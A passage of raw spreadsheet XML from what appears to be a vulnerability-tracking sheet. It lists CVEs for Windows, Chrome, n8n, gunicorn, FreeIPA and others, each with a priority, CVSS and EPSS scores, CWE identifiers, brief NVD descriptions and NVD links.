t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P409" s="5" t="inlineStr" /><c r="Q409" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R409" s="5" t="inlineStr"><is><t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S409" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t></is></c></row><row r="410"><c r="A410" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B410" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C410" s="5" t="inlineStr"><is><t>CVE-2026-83992</t></is></c><c r="D410" s="5" t="n"><v>8.800000000000001</v></c><c r="E410" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F410" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G410" s="5" t="inlineStr" /><c r="H410" s="5" t="n"><v>0.006</v></c><c r="I410" s="5" t="inlineStr" /><c r="J410" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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10" s="5" t="inlineStr" /><c r="M410" s="5" t="inlineStr" /><c r="N410" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O410" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P410" s="5" t="inlineStr" /><c r="Q410" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R410" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S410" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t></is></c></row><row r="411"><c r="A411" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B411" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C411" s="5" t="inlineStr"><is><t>CVE-2026-83996</t></is></c><c r="D411" s="5" t="n"><v>8.800000000000001</v></c><c r="E411" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F411" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G411" s="5" t="inlineStr" /><c r="H411" s="5" t="n"><v>0.002</v></c><c r="I411" s="5" t="inlineStr" /><c r="J411" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K41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411" s="5" t="inlineStr" /><c r="M411" s="5" t="inlineStr" /><c r="N411" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O411" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P411" s="5" t="inlineStr" /><c r="Q411" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R411" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S411" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t></is></c></row><row r="412"><c r="A412" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B412" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C412" s="5" t="inlineStr"><is><t>CVE-2026-83998</t></is></c><c r="D412" s="5" t="n"><v>8.800000000000001</v></c><c r="E412" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F412" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G412" s="5" t="inlineStr" /><c r="H412" s="5" t="n"><v>0.004</v></c><c r="I412" s="5" t="inlineStr" /><c r="J412" s="5" t="inlineStr" /><c r="K412" s="5" t="inlineStr" /><c r="L412" s="5" t="inlineStr" /><c r="M412" s="5" t="inlineStr" /><c r="N412" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O412" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P412" s="5" t="inlineStr" /><c r="Q412" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R412" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S412" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83998</t></is></c></row><row r="413"><c r="A413" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B413" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C413" s="5" t="inlineStr"><is><t>CVE-2026-84187</t></is></c><c r="D413" s="5" t="n"><v>8.800000000000001</v></c><c r="E413" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F413" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G413" s="5" t="inlineStr" /><c r="H413" s="5" t="n"><v>0.003</v></c><c r="I413" s="5" t="inlineStr" /><c r="J413" s="5" t="inlineStr" /><c r="K413" s="5" t="inlineStr" /><c r="L413" s="5" t="inlineStr" /><c r="M413" s="5" t="inlineStr" /><c r="N413" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O413" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P413" s="5" t="inlineStr" /><c r="Q413" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R413" s="5" t="inlineStr"><is><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is></c><c r="S413" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84187</t></is></c></row><row r="414"><c r="A414" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B414" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C414" s="5" t="inlineStr"><is><t>CVE-2026-85049</t></is></c><c r="D414" s="5" t="n"><v>8.800000000000001</v></c><c r="E414" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F414" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G414" s="5" t="inlineStr" /><c r="H414" s="5" t="n"><v>0.003</v></c><c r="I414" s="5" t="inlineStr" /><c r="J414" s="5" t="inlineStr" /><c r="K414" s="5" t="inlineStr"><is><t>google:chrome</t></is></c><c r="L414" s="5" t="inlineStr" /><c r="M414" s="5" t="inlineStr" /><c r="N414" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O414" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P414" s="5" t="inlineStr" /><c r="Q414" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R414" s="5" t="inlineStr"><is><t>Use after free in Skia in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t></is></c><c r="S414" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85049</t></is></c></row><row r="415"><c r="A415" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B415" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C415" s="5" t="inlineStr"><is><t>CVE-2026-85051</t></is></c><c r="D415" s="5" t="n"><v>8.800000000000001</v></c><c r="E415" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F415" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G415" s="5" t="inlineStr" /><c r="H415" s="5" t="n"><v>0.003</v></c><c r="I415" s="5" t="inlineStr" /><c r="J415" s="5" t="inlineStr" /><c r="K415" s="5" t="inlineStr"><is><t>google:chrome</t></is></c><c r="L415" s="5" t="inlineStr" /><c r="M415" s="5" t="inlineStr" /><c r="N415" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O415" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P415" s="5" t="inlineStr" /><c r="Q415" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="R415" s="5" t="inlineStr"><is><t>Type confusion in Compositing in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t></is></c><c r="S415" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85051</t></is></c></row><row r="416"><c r="A416" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B416" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C416" s="5" t="inlineStr"><is><t>CVE-2026-85053</t></is></c><c r="D416" s="5" t="n"><v>8.800000000000001</v></c><c r="E416" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F416" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G416" s="5" t="inlineStr" /><c r="H416" s="5" t="n"><v>0.003</v></c><c r="I416" s="5" t="inlineStr" /><c r="J416" s="5" t="inlineStr" /><c r="K416" s="5" t="inlineStr"><is><t>google:chrome</t></is></c><c r="L416" s="5" t="inlineStr" /><c r="M416" s="5" t="inlineStr" /><c r="N416" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O416" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P416" s="5" t="inlineStr" /><c r="Q416" s="5" t="inlineStr"><is><t>CWE-668</t></is></c><c r="R416" s="5" t="inlineStr"><is><t>Improper resource exposure in CacheStorage in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t></is></c><c r="S416" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85053</t></is></c></row><row r="417"><c r="A417" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B417" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C417" s="5" t="inlineStr"><is><t>CVE-2026-85094</t></is></c><c r="D417" s="5" t="n"><v>8.800000000000001</v></c><c r="E417" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F417" s="5" t="inlineStr"><is><t>61adb53e-e4b3-47f7-8a93-4717c9e77dc6</t></is></c><c r="G417" s="5" t="inlineStr" /><c r="H417" s="5" t="n"><v>0.002</v></c><c r="I417" s="5" t="inlineStr" /><c r="J417" s="5" t="inlineStr" /><c r="K417" s="5" t="inlineStr" /><c r="L417" s="5" t="inlineStr" /><c r="M417" s="5" t="inlineStr" /><c r="N417" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O417" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P417" s="5" t="inlineStr" /><c r="Q417" s="5" t="inlineStr"><is><t>CWE-212</t></is></c><c r="R417" s="5" t="inlineStr"><is><t>The Canva Android App  before 2.376.0 did not restrict the headers returned to an external origin running in a privileged WebView. A threat actor with control of the WebView could access a user’s session.</t></is></c><c r="S417" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85094</t></is></c></row><row r="418"><c r="A418" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B418" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C418" s="5" t="inlineStr"><is><t>CVE-2026-85175</t></is></c><c r="D418" s="5" t="n"><v>8.800000000000001</v></c><c r="E418" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F418" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G418" s="5" t="inlineStr" /><c r="H418" s="5" t="n"><v>0.002</v></c><c r="I418" s="5" t="inlineStr" /><c r="J418" s="5" t="inlineStr" /><c r="K418" s="5" t="inlineStr" /><c r="L418" s="5" t="inlineStr" /><c r="M418" s="5" t="inlineStr" /><c r="N418" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O418" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P418" s="5" t="inlineStr" /><c r="Q418" s="5" t="inlineStr"><is><t>CWE-552</t></is></c><c r="R418" s="5" t="inlineStr"><is><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is></c><c r="S418" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85175</t></is></c></row><row r="419"><c r="A419" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B419" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C419" s="5" t="inlineStr"><is><t>CVE-2026-85430</t></is></c><c r="D419" s="5" t="n"><v>8.800000000000001</v></c><c r="E419" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F419" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G419" s="5" t="inlineStr" /><c r="H419" s="5" t="n"><v>0.01</v></c><c r="I419" s="5" t="inlineStr" /><c r="J419" s="5" t="inlineStr" /><c r="K419" s="5" t="inlineStr" /><c r="L419" s="5" t="inlineStr" /><c r="M419" s="5" t="inlineStr" /><c r="N419" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O419" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P419" s="5" t="inlineStr" /><c r="Q419" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="R419" s="5" t="inlineStr"><is><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is></c><c r="S419" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85430</t></is></c></row><row r="420"><c r="A420" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B420" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C420" s="5" t="inlineStr"><is><t>CVE-2026-85432</t></is></c><c r="D420" s="5" t="n"><v>8.800000000000001</v></c><c r="E420" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F420" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G420" s="5" t="inlineStr" /><c r="H420" s="5" t="n"><v>0.003</v></c><c r="I420" s="5" t="inlineStr" /><c r="J420" s="5" t="inlineStr" /><c r="K420" s="5" t="inlineStr" /><c r="L420" s="5" t="inlineStr" /><c r="M420" s="5" t="inlineStr" /><c r="N420" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O420" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P420" s="5" t="inlineStr" /><c r="Q420" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="R420" s="5" t="inlineStr"><is><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is></c><c r="S420" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85432</t></is></c></row><row r="421"><c r="A421" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B421" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C421" s="5" t="inlineStr"><is><t>CVE-2026-85455</t></is></c><c r="D421" s="5" t="n"><v>8.800000000000001</v></c><c r="E421" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F421" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G421" s="5" t="inlineStr" /><c r="H421" s="5" t="n"><v>0.004</v></c><c r="I421" s="5" t="inlineStr" /><c r="J421" s="5" t="inlineStr" /><c r="K421" s="5" t="inlineStr" /><c r="L421" s="5" t="inlineStr" /><c r="M421" s="5" t="inlineStr" /><c r="N421" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O421" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P421" s="5" t="inlineStr" /><c r="Q421" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R421" s="5" t="inlineStr"><is><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is></c><c r="S421" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85455</t></is></c></row><row r="422"><c r="A422" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B422" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C422" s="5" t="inlineStr"><is><t>CVE-2026-85684</t></is></c><c r="D422" s="5" t="n"><v>8.800000000000001</v></c><c r="E422" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F422" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G422" s="5" t="inlineStr" /><c r="H422" s="5" t="n"><v>0.007</v></c><c r="I422" s="5" t="inlineStr" /><c r="J422" s="5" t="inlineStr" /><c r="K422" s="5" t="inlineStr" /><c r="L422" s="5" t="inlineStr" /><c r="M422" s="5" t="inlineStr" /><c r="N422" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O422" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P422" s="5" t="inlineStr" /><c r="Q422" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R422" s="5" t="inlineStr"><is><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is></c><c r="S422" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85684</t></is></c></row><row r="423"><c r="A423" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B423" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C423" s="5" t="inlineStr"><is><t>CVE-2026-85877</t></is></c><c r="D423" s="5" t="n"><v>8.800000000000001</v></c><c r="E423" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F423" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G423" s="5" t="inlineStr" /><c r="H423" s="5" t="n"><v>0.004</v></c><c r="I423" s="5" t="inlineStr" /><c r="J423" s="5" t="inlineStr" /><c r="K423" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2</t></is></c><c r="L423" s="5" t="inlineStr" /><c r="M423" s="5" t="inlineStr" /><c r="N423" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O423" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P423" s="5" t="inlineStr" /><c r="Q423" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R423" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S423" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85877</t></is></c></row><row r="424"><c r="A424" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B424" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C424" s="5" t="inlineStr"><is><t>CVE-2026-86076</t></is></c><c r="D424" s="5" t="n"><v>8.800000000000001</v></c><c r="E424" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F424" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G424" s="5" t="inlineStr" /><c r="H424" s="5" t="n"><v>0.004</v></c><c r="I424" s="5" t="inlineStr" /><c r="J424" s="5" t="inlineStr" /><c r="K424" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L424" s="5" t="inlineStr" /><c r="M424" s="5" t="inlineStr" /><c r="N424" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O424" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P424" s="5" t="inlineStr" /><c r="Q424" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R424" s="5" t="inlineStr"><is><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is></c><c r="S424" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86076</t></is></c></row><row r="425"><c r="A425" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B425" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C425" s="5" t="inlineStr"><is><t>CVE-2026-86083</t></is></c><c r="D425" s="5" t="n"><v>8.800000000000001</v></c><c r="E425" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F425" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G425" s="5" t="inlineStr" /><c r="H425" s="5" t="n"><v>0.004</v></c><c r="I425" s="5" t="inlineStr" /><c r="J425" s="5" t="inlineStr" /><c r="K425" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L425" s="5" t="inlineStr" /><c r="M425" s="5" t="inlineStr" /><c r="N425" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O425" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P425" s="5" t="inlineStr" /><c r="Q425" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R425" s="5" t="inlineStr"><is><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is></c><c r="S425" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86083</t></is></c></row><row r="426"><c r="A426" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B426" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C426" s="5" t="inlineStr"><is><t>CVE-2026-86730</t></is></c><c r="D426" s="5" t="n"><v>8.800000000000001</v></c><c r="E426" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F426" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G426" s="5" t="inlineStr" /><c r="H426" s="5" t="n"><v>0.004</v></c><c r="I426" s="5" t="inlineStr" /><c r="J426" s="5" t="inlineStr" /><c r="K426" s="5" t="inlineStr" /><c r="L426" s="5" t="inlineStr" /><c r="M426" s="5" t="inlineStr" /><c r="N426" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O426" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P426" s="5" t="inlineStr" /><c r="Q426" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R426" s="5" t="inlineStr"><is><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is></c><c r="S426" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86730</t></is></c></row><row r="427"><c r="A427" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B427" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C427" s="5" t="inlineStr"><is><t>CVE-2018-1000164</t></is></c><c r="D427" s="5" t="n"><v>8.699999999999999</v></c><c r="E427" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F427" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G427" s="5" t="inlineStr" /><c r="H427" s="5" t="n"><v>0.024</v></c><c r="I427" s="5" t="inlineStr" /><c r="J427" s="5" t="inlineStr" /><c r="K427" s="5" t="inlineStr" /><c r="L427" s="5" t="inlineStr"><is><t>pip:gunicorn</t></is></c><c r="M427" s="5" t="inlineStr"><is><t>19.5.0</t></is></c><c r="N427" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O427" s="5" t="inlineStr" /><c r="P427" s="5" t="inlineStr" /><c r="Q427" s="5" t="inlineStr"><is><t>CWE-93</t></is></c><c r="R427" s="5" t="inlineStr"><is><t>gunicorn version 19.4.5 contains a CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers vulnerability in "process_headers" function in "gunicorn/http/wsgi.py" that can result in an attacker causing the server to return arbitrary HTTP headers. This vulnerability appears to have been fixed in 19.5.0.</t></is></c><c r="S427" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2018-1000164</t></is></c></row><row r="428"><c r="A428" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B428" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C428" s="5" t="inlineStr"><is><t>CVE-2019-25766</t></is></c><c r="D428" s="5" t="n"><v>8.699999999999999</v></c><c r="E428" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F428" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G428" s="5" t="inlineStr" /><c r="H428" s="5" t="n"><v>0.003</v></c><c r="I428" s="5" t="inlineStr" /><c r="J428" s="5" t="inlineStr" /><c r="K428" s="5" t="inlineStr" /><c r="L428" s="5" t="inlineStr" /><c r="M428" s="5" t="inlineStr" /><c r="N428" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O428" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P428" s="5" t="inlineStr" /><c r="Q428" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="R428" s="5" t="inlineStr"><is><t>Renovate versions &gt;= 13.87.0 and &lt;= 19.38.6 leak temporary repository tokens into pull request comments during certain Go Modules update failure scenarios. The issue is fixed in version 19.38.7. Anyone able to view the affected pull request comments could obtain the exposed tokens.</t></is></c><c r="S428" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2019-25766</t></is></c></row><row r="429"><c r="A429" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B429" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C429" s="5" t="inlineStr"><is><t>CVE-2020-36939</t></is></c><c r="D429" s="5" t="n"><v>8.699999999999999</v></c><c r="E429" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F429" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G429" s="5" t="inlineStr" /><c r="H429" s="5" t="n"><v>0.026</v></c><c r="I429" s="5" t="inlineStr" /><c r="J429" s="5" t="inlineStr" /><c r="K429" s="5" t="inlineStr" /><c r="L429" s="5" t="inlineStr"><is><t>rubygems:cassandra-web</t></is></c><c r="M429" s="5" t="inlineStr" /><c r="N429" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O429" s="5" t="inlineStr" /><c r="P429" s="5" t="inlineStr" /><c r="Q429" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R429" s="5" t="inlineStr"><is><t>Cassandra Web 0.5.0 contains a directory traversal vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating path traversal parameters. Attackers can exploit the disabled Rack::Protection module to read sensitive system files like /etc/passwd and retrieve Apache Cassandra database credentials.</t></is></c><c r="S429" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2020-36939</t></is></c></row><row r="430"><c r="A430" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B430" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C430" s="5" t="inlineStr"><is><t>CVE-2020-37267</t></is></c><c r="D430" s="5" t="n"><v>8.699999999999999</v></c><c r="E430" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F430" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G430" s="5" t="inlineStr" /><c r="H430" s="5" t="n"><v>0.003</v></c><c r="I430" s="5" t="inlineStr" /><c r="J430" s="5" t="inlineStr" /><c r="K430" s="5" t="inlineStr" /><c r="L430" s="5" t="inlineStr" /><c r="M430" s="5" t="inlineStr" /><c r="N430" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O430" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P430" s="5" t="inlineStr" /><c r="Q430" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="R430" s="5" t="inlineStr"><is><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is></c><c r="S430" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2020-37267</t></is></c></row><row r="431"><c r="A431" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B431" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C431" s="5" t="inlineStr"><is><t>CVE-2026-0799</t></is></c><c r="D431" s="5" t="n"><v>8.699999999999999</v></c><c r="E431" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F431" s="5" t="inlineStr"><is><t>security@tcpdump.org</t></is></c><c r="G431" s="5" t="inlineStr" /><c r="H431" s="5" t="n"><v>0.001</v></c><c r="I431" s="5" t="inlineStr" /><c r="J431" s="5" t="inlineStr" /><c r="K431" s="5" t="inlineStr" /><c r="L431" s="5" t="inlineStr" /><c r="M431" s="5" t="inlineStr" /><c r="N431" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O431" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P431" s="5" t="inlineStr" /><c r="Q431" s="5" t="inlineStr"><is><t>CWE-125, CWE-129, CWE-787</t></is></c><c r="R431" s="5" t="inlineStr"><is><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is></c><c r="S431" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0799</t></is></c></row><row r="432"><c r="A432" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B432" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C432" s="5" t="inlineStr"><is><t>CVE-2026-12611</t></is></c><c r="D432" s="5" t="n"><v>8.699999999999999</v></c><c r="E432" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F432" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G432" s="5" t="inlineStr" /><c r="H432" s="5" t="n"><v>0.003</v></c><c r="I432" s="5" t="inlineStr" /><c r="J432" s="5" t="inlineStr" /><c r="K432" s="5" t="inlineStr" /><c r="L432" s="5" t="inlineStr" /><c r="M432" s="5" t="inlineStr" /><c r="N432" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O432" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P432" s="5" t="inlineStr" /><c r="Q432" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R432" s="5" t="inlineStr"><is><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is></c><c r="S432" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12611</t></is></c></row><row r="433"><c r="A433" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B433" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C433" s="5" t="inlineStr"><is><t>CVE-2026-13097</t></is></c><c r="D433" s="5" t="n"><v>8.699999999999999</v></c><c r="E433" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F433" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G433" s="5" t="inlineStr" /><c r="H433" s="5" t="n"><v>0.003</v></c><c r="I433" s="5" t="inlineStr" /><c r="J433" s="5" t="inlineStr" /><c r="K433" s="5" t="inlineStr"><is><t>freeipa:freeipa, redhat:enterprise_linux</t></is></c><c r="L433" s="5" t="inlineStr" /><c r="M433" s="5" t="inlineStr" /><c r="N433" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O433" s="5" t="inlineStr"><is><t>2026-08-20</t></is></c><c r="P433" s="5" t="inlineStr" /><c r="Q433" s="5" t="inlineStr"><is><t>CWE-706</t></is></c><c r="R433" s="5" t="inlineStr"><is><t>A privilege escalation flaw was found in FreeIPA. The 